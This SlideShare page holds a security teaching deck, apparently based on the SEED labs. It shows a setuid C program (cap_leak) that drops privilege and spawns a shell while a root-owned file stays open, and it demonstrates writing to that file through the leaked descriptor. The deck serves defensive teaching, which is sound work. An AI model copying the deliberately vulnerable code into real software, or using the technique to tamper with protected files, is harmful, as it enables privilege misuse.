SlideShare a Scribd company logo
1 of 10
Download to read offline
Can I write to a read only file?
- Oops the file was not closed
Dr. Dharma Ganesan
Background and Problem
● A file is owned by the root (admin)
● Other users can read its content but cannot write to it
● An SUID Linux binary can write to that file
● The SUID binary drops the privilege before spawning a new process
○ The new process is not owned by the root
● Problem: The parent process forgot to close the file
● Can the less privileged child process write to the read only file?
/etc/zzz is owned by the root
~$ ls -al /etc/zzz
-rw-r--r-- 1 root root 29 May 2 07:48 /etc/zzz
Other users can read (r) it but only the root can write (w) to it.
Let’s try to write to the read only file
~$ echo "Writing to a read only file" > /etc/zzz
bash: /etc/zzz: Permission denied
● Let’s find an SUID Linux binary that may have some vulnerability
● Cap_Leak is a demo example (on the next slide)
● Cap_Leak has a vulnerability we will exploit!
○ Cap_Leak will leak the file descriptor
Cap_leak can write to the /etc/zzz file
~$ ls -al cap_leak
-rwsr-xr-x 1 root seed 7386 Apr 29 18:45 cap_leak
● Note: cap_leak is an SUID binary (s)
● However, other users are allowed to execute it “as a root” temporarily
● The source code of cap_leak.c is on the next slide
○ Header files are not included to save space
void main() {
int fd;
char *v[2];
/* Assume that /etc/zzz is an important system file,
* and it is owned by root with permission 0644… */
fd = open("/etc/zzz", O_RDWR | O_APPEND);
/* Error handling code is removed to save space on the slide */
// Print out the file descriptor value
printf("fd is %dn", fd);
// Permanently disable the privilege by making the effective uid the same as the real uid
setuid(getuid());
// Execute /bin/sh
v[0] = "/bin/sh"; v[1] = 0;
execve(v[0], v, 0);
}
The file is not closed before
spawning a less privileged
child process
~$ cat /etc/zzz
bbbbbbbbbbbbbbbbbbbbbbbbbbbb
Content of the read only file (before the attack)
Content of the read only file (after the attack)
~$ ./cap_leak
fd is 3
$ echo "If we fail to close the files, someone can write to them!" >& 3
$
$ exit
~$ cat /etc/zzz
bbbbbbbbbbbbbbbbbbbbbbbbbbbb
If we fail to close the files, someone can write to them!
Conclusion
● This demo shows that we need to close all opened files
● Otherwise, evil processes can write to read only files
● Dropping the privilege is not enough
● Don’t assume that the child process need the file descriptor to exploit
○ File descriptors are small numbers that are easy to guess
Reference
Wenliang Du. “Computer Security, A Hands-on Approach,” CreateSpace
Independent Publishing Platform; 1 edition (October 12, 2017)

More Related Content

What's hot

System administration
System administrationSystem administration
System administrationpuspa joshi
 
리눅스 간단 강의 5강
리눅스 간단 강의 5강리눅스 간단 강의 5강
리눅스 간단 강의 5강Junsu Kim
 
Find & Locate utility Linux
Find & Locate utility LinuxFind & Locate utility Linux
Find & Locate utility LinuxBhavik Bhansali
 
An Introduction to GNU/Linux
An Introduction to GNU/LinuxAn Introduction to GNU/Linux
An Introduction to GNU/LinuxAhmad Haghighi
 
Macros code for Protecting and Unprotecting Sheets
Macros code for Protecting and Unprotecting SheetsMacros code for Protecting and Unprotecting Sheets
Macros code for Protecting and Unprotecting SheetsPramodkumar Jha
 
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Codemotion
 
An Overview of HTML5 Storage
An Overview of HTML5 StorageAn Overview of HTML5 Storage
An Overview of HTML5 StoragePaul Irish
 
NFS ubuntu Server and windows 7 Client
NFS ubuntu Server and windows 7 ClientNFS ubuntu Server and windows 7 Client
NFS ubuntu Server and windows 7 ClientAyoung Saing-exe
 
新建 文本文档
新建 文本文档新建 文本文档
新建 文本文档mytwice
 
Node.js Authentication and Data Security
Node.js Authentication and Data SecurityNode.js Authentication and Data Security
Node.js Authentication and Data SecurityJonathan LeBlanc
 
Python data file handling
Python data file handlingPython data file handling
Python data file handlingToniyaP1
 
PHP Identity and Data Security
PHP Identity and Data SecurityPHP Identity and Data Security
PHP Identity and Data SecurityJonathan LeBlanc
 
Mounting usb free bsd
Mounting usb free bsdMounting usb free bsd
Mounting usb free bsdKang Izur
 
Perl Intro 8 File Handles
Perl Intro 8 File HandlesPerl Intro 8 File Handles
Perl Intro 8 File HandlesShaun Griffith
 

What's hot (20)

Unix for Librarians
Unix for LibrariansUnix for Librarians
Unix for Librarians
 
System administration
System administrationSystem administration
System administration
 
리눅스 간단 강의 5강
리눅스 간단 강의 5강리눅스 간단 강의 5강
리눅스 간단 강의 5강
 
Find & Locate utility Linux
Find & Locate utility LinuxFind & Locate utility Linux
Find & Locate utility Linux
 
An Introduction to GNU/Linux
An Introduction to GNU/LinuxAn Introduction to GNU/Linux
An Introduction to GNU/Linux
 
Restricting unix users
Restricting unix usersRestricting unix users
Restricting unix users
 
Tag
TagTag
Tag
 
Macros code for Protecting and Unprotecting Sheets
Macros code for Protecting and Unprotecting SheetsMacros code for Protecting and Unprotecting Sheets
Macros code for Protecting and Unprotecting Sheets
 
Linux basic1&2
Linux basic1&2Linux basic1&2
Linux basic1&2
 
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
 
An Overview of HTML5 Storage
An Overview of HTML5 StorageAn Overview of HTML5 Storage
An Overview of HTML5 Storage
 
Git installation
Git installationGit installation
Git installation
 
NFS ubuntu Server and windows 7 Client
NFS ubuntu Server and windows 7 ClientNFS ubuntu Server and windows 7 Client
NFS ubuntu Server and windows 7 Client
 
新建 文本文档
新建 文本文档新建 文本文档
新建 文本文档
 
Node.js Authentication and Data Security
Node.js Authentication and Data SecurityNode.js Authentication and Data Security
Node.js Authentication and Data Security
 
Python data file handling
Python data file handlingPython data file handling
Python data file handling
 
PHP Identity and Data Security
PHP Identity and Data SecurityPHP Identity and Data Security
PHP Identity and Data Security
 
Mounting usb free bsd
Mounting usb free bsdMounting usb free bsd
Mounting usb free bsd
 
Perl Intro 8 File Handles
Perl Intro 8 File HandlesPerl Intro 8 File Handles
Perl Intro 8 File Handles
 
JSOP in 60 seconds
JSOP in 60 secondsJSOP in 60 seconds
JSOP in 60 seconds
 

Similar to Can I write to a read only file ?

Similar to Can I write to a read only file ? (20)

Linux Directory Structure
Linux Directory StructureLinux Directory Structure
Linux Directory Structure
 
Fun with FUSE
Fun with FUSEFun with FUSE
Fun with FUSE
 
An Introduction To Linux
An Introduction To LinuxAn Introduction To Linux
An Introduction To Linux
 
Linux
LinuxLinux
Linux
 
Linux Internals Part - 1
Linux Internals Part - 1Linux Internals Part - 1
Linux Internals Part - 1
 
Aide
AideAide
Aide
 
beginner.en.print
beginner.en.printbeginner.en.print
beginner.en.print
 
beginner.en.print
beginner.en.printbeginner.en.print
beginner.en.print
 
beginner.en.print
beginner.en.printbeginner.en.print
beginner.en.print
 
Rhel 6.2 complete ebook
Rhel 6.2  complete ebookRhel 6.2  complete ebook
Rhel 6.2 complete ebook
 
Rhel 6.2 complete ebook
Rhel 6.2 complete ebookRhel 6.2 complete ebook
Rhel 6.2 complete ebook
 
Grub and dracut ii
Grub and dracut iiGrub and dracut ii
Grub and dracut ii
 
Adhocr T-dose 2012
Adhocr T-dose 2012Adhocr T-dose 2012
Adhocr T-dose 2012
 
openbsd-as-nas.pdf
openbsd-as-nas.pdfopenbsd-as-nas.pdf
openbsd-as-nas.pdf
 
Linux kernel modules
Linux kernel modulesLinux kernel modules
Linux kernel modules
 
Unix Administration 4
Unix Administration 4Unix Administration 4
Unix Administration 4
 
File system discovery
File system discovery File system discovery
File system discovery
 
Analyze corefile and backtraces with GDB for Mysql/MariaDB on Linux - Nilanda...
Analyze corefile and backtraces with GDB for Mysql/MariaDB on Linux - Nilanda...Analyze corefile and backtraces with GDB for Mysql/MariaDB on Linux - Nilanda...
Analyze corefile and backtraces with GDB for Mysql/MariaDB on Linux - Nilanda...
 
Description of GRUB 2
Description of GRUB 2Description of GRUB 2
Description of GRUB 2
 
Confraria SECURITY & IT - Lisbon Set 29, 2011
Confraria SECURITY & IT - Lisbon Set 29, 2011Confraria SECURITY & IT - Lisbon Set 29, 2011
Confraria SECURITY & IT - Lisbon Set 29, 2011
 

More from Dharmalingam Ganesan

Reverse Architecting using Relation Algebra.pdf
Reverse Architecting using Relation Algebra.pdfReverse Architecting using Relation Algebra.pdf
Reverse Architecting using Relation Algebra.pdfDharmalingam Ganesan
 
Cyclic Attacks on the RSA Trapdoor Function
Cyclic Attacks on the RSA Trapdoor FunctionCyclic Attacks on the RSA Trapdoor Function
Cyclic Attacks on the RSA Trapdoor FunctionDharmalingam Ganesan
 
An Analysis of RSA Public Exponent e
An Analysis of RSA Public Exponent eAn Analysis of RSA Public Exponent e
An Analysis of RSA Public Exponent eDharmalingam Ganesan
 
An Analysis of Secure Remote Password (SRP)
An Analysis of Secure Remote Password (SRP)An Analysis of Secure Remote Password (SRP)
An Analysis of Secure Remote Password (SRP)Dharmalingam Ganesan
 
How do computers exchange secrets using Math?
How do computers exchange secrets using Math?How do computers exchange secrets using Math?
How do computers exchange secrets using Math?Dharmalingam Ganesan
 
On the Secrecy of RSA Private Keys
On the Secrecy of RSA Private KeysOn the Secrecy of RSA Private Keys
On the Secrecy of RSA Private KeysDharmalingam Ganesan
 
Computing the Square Roots of Unity to break RSA using Quantum Algorithms
Computing the Square Roots of Unity to break RSA using Quantum AlgorithmsComputing the Square Roots of Unity to break RSA using Quantum Algorithms
Computing the Square Roots of Unity to break RSA using Quantum AlgorithmsDharmalingam Ganesan
 
Analysis of Short RSA Secret Exponent d
Analysis of Short RSA Secret Exponent dAnalysis of Short RSA Secret Exponent d
Analysis of Short RSA Secret Exponent dDharmalingam Ganesan
 
Dependency Analysis of RSA Private Variables
Dependency Analysis of RSA Private VariablesDependency Analysis of RSA Private Variables
Dependency Analysis of RSA Private VariablesDharmalingam Ganesan
 
Solutions to online rsa factoring challenges
Solutions to online rsa factoring challengesSolutions to online rsa factoring challenges
Solutions to online rsa factoring challengesDharmalingam Ganesan
 
Security of RSA and Integer Factorization
Security of RSA and Integer FactorizationSecurity of RSA and Integer Factorization
Security of RSA and Integer FactorizationDharmalingam Ganesan
 

More from Dharmalingam Ganesan (20)

.NET Deserialization Attacks
.NET Deserialization Attacks.NET Deserialization Attacks
.NET Deserialization Attacks
 
Reverse Architecting using Relation Algebra.pdf
Reverse Architecting using Relation Algebra.pdfReverse Architecting using Relation Algebra.pdf
Reverse Architecting using Relation Algebra.pdf
 
How to exploit rand()?
How to exploit rand()?How to exploit rand()?
How to exploit rand()?
 
Cyclic Attacks on the RSA Trapdoor Function
Cyclic Attacks on the RSA Trapdoor FunctionCyclic Attacks on the RSA Trapdoor Function
Cyclic Attacks on the RSA Trapdoor Function
 
An Analysis of RSA Public Exponent e
An Analysis of RSA Public Exponent eAn Analysis of RSA Public Exponent e
An Analysis of RSA Public Exponent e
 
An Analysis of Secure Remote Password (SRP)
An Analysis of Secure Remote Password (SRP)An Analysis of Secure Remote Password (SRP)
An Analysis of Secure Remote Password (SRP)
 
Thank-a-Gram
Thank-a-GramThank-a-Gram
Thank-a-Gram
 
Active Attacks on DH Key Exchange
Active Attacks on DH Key ExchangeActive Attacks on DH Key Exchange
Active Attacks on DH Key Exchange
 
How do computers exchange secrets using Math?
How do computers exchange secrets using Math?How do computers exchange secrets using Math?
How do computers exchange secrets using Math?
 
On the Secrecy of RSA Private Keys
On the Secrecy of RSA Private KeysOn the Secrecy of RSA Private Keys
On the Secrecy of RSA Private Keys
 
Computing the Square Roots of Unity to break RSA using Quantum Algorithms
Computing the Square Roots of Unity to break RSA using Quantum AlgorithmsComputing the Square Roots of Unity to break RSA using Quantum Algorithms
Computing the Square Roots of Unity to break RSA using Quantum Algorithms
 
Analysis of Short RSA Secret Exponent d
Analysis of Short RSA Secret Exponent dAnalysis of Short RSA Secret Exponent d
Analysis of Short RSA Secret Exponent d
 
Dependency Analysis of RSA Private Variables
Dependency Analysis of RSA Private VariablesDependency Analysis of RSA Private Variables
Dependency Analysis of RSA Private Variables
 
Analysis of Shared RSA Modulus
Analysis of Shared RSA ModulusAnalysis of Shared RSA Modulus
Analysis of Shared RSA Modulus
 
RSA Game using an Oracle
RSA Game using an OracleRSA Game using an Oracle
RSA Game using an Oracle
 
RSA Two Person Game
RSA Two Person GameRSA Two Person Game
RSA Two Person Game
 
RSA without Integrity Checks
RSA without Integrity ChecksRSA without Integrity Checks
RSA without Integrity Checks
 
RSA without Padding
RSA without PaddingRSA without Padding
RSA without Padding
 
Solutions to online rsa factoring challenges
Solutions to online rsa factoring challengesSolutions to online rsa factoring challenges
Solutions to online rsa factoring challenges
 
Security of RSA and Integer Factorization
Security of RSA and Integer FactorizationSecurity of RSA and Integer Factorization
Security of RSA and Integer Factorization
 

Recently uploaded

Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...Jaydeep Chhasatia
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadIvo Andreev
 
Growing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesGrowing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesSoftwareMill
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyRaymond Okyere-Forson
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorShane Coughlan
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLAlluxio, Inc.
 
Generative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilGenerative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilVICTOR MAESTRE RAMIREZ
 
Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Incrobinwilliams8624
 
Watermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesWatermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesShyamsundar Das
 
eAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionseAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionsNirav Modi
 
ERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxAutus Cyber Tech
 
Fields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxFields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxJoão Esperancinha
 
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.Sharon Liu
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfBrain Inventory
 
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...OnePlan Solutions
 
Top Software Development Trends in 2024
Top Software Development Trends in  2024Top Software Development Trends in  2024
Top Software Development Trends in 2024Mind IT Systems
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfTobias Schneck
 
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageSales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageDista
 
Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsYour Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsJaydeep Chhasatia
 

Recently uploaded (20)

Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and Bad
 
Growing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesGrowing Oxen: channel operators and retries
Growing Oxen: channel operators and retries
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human Beauty
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS Calculator
 
Salesforce AI Associate Certification.pptx
Salesforce AI Associate Certification.pptxSalesforce AI Associate Certification.pptx
Salesforce AI Associate Certification.pptx
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
 
Generative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilGenerative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-Council
 
Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Inc
 
Watermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesWatermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security Challenges
 
eAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionseAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspections
 
ERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptx
 
Fields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxFields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptx
 
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdf
 
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
 
Top Software Development Trends in 2024
Top Software Development Trends in  2024Top Software Development Trends in  2024
Top Software Development Trends in 2024
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
 
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageSales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
 
Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsYour Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
 

Can I write to a read only file ?

  • 1. Can I write to a read only file? - Oops the file was not closed Dr. Dharma Ganesan
  • 2. Background and Problem ● A file is owned by the root (admin) ● Other users can read its content but cannot write to it ● An SUID Linux binary can write to that file ● The SUID binary drops the privilege before spawning a new process ○ The new process is not owned by the root ● Problem: The parent process forgot to close the file ● Can the less privileged child process write to the read only file?
  • 3. /etc/zzz is owned by the root ~$ ls -al /etc/zzz -rw-r--r-- 1 root root 29 May 2 07:48 /etc/zzz Other users can read (r) it but only the root can write (w) to it.
  • 4. Let’s try to write to the read only file ~$ echo "Writing to a read only file" > /etc/zzz bash: /etc/zzz: Permission denied ● Let’s find an SUID Linux binary that may have some vulnerability ● Cap_Leak is a demo example (on the next slide) ● Cap_Leak has a vulnerability we will exploit! ○ Cap_Leak will leak the file descriptor
  • 5. Cap_leak can write to the /etc/zzz file ~$ ls -al cap_leak -rwsr-xr-x 1 root seed 7386 Apr 29 18:45 cap_leak ● Note: cap_leak is an SUID binary (s) ● However, other users are allowed to execute it “as a root” temporarily ● The source code of cap_leak.c is on the next slide ○ Header files are not included to save space
  • 6. void main() { int fd; char *v[2]; /* Assume that /etc/zzz is an important system file, * and it is owned by root with permission 0644… */ fd = open("/etc/zzz", O_RDWR | O_APPEND); /* Error handling code is removed to save space on the slide */ // Print out the file descriptor value printf("fd is %dn", fd); // Permanently disable the privilege by making the effective uid the same as the real uid setuid(getuid()); // Execute /bin/sh v[0] = "/bin/sh"; v[1] = 0; execve(v[0], v, 0); } The file is not closed before spawning a less privileged child process
  • 7. ~$ cat /etc/zzz bbbbbbbbbbbbbbbbbbbbbbbbbbbb Content of the read only file (before the attack)
  • 8. Content of the read only file (after the attack) ~$ ./cap_leak fd is 3 $ echo "If we fail to close the files, someone can write to them!" >& 3 $ $ exit ~$ cat /etc/zzz bbbbbbbbbbbbbbbbbbbbbbbbbbbb If we fail to close the files, someone can write to them!
  • 9. Conclusion ● This demo shows that we need to close all opened files ● Otherwise, evil processes can write to read only files ● Dropping the privilege is not enough ● Don’t assume that the child process need the file descriptor to exploit ○ File descriptors are small numbers that are easy to guess
  • 10. Reference Wenliang Du. “Computer Security, A Hands-on Approach,” CreateSpace Independent Publishing Platform; 1 edition (October 12, 2017)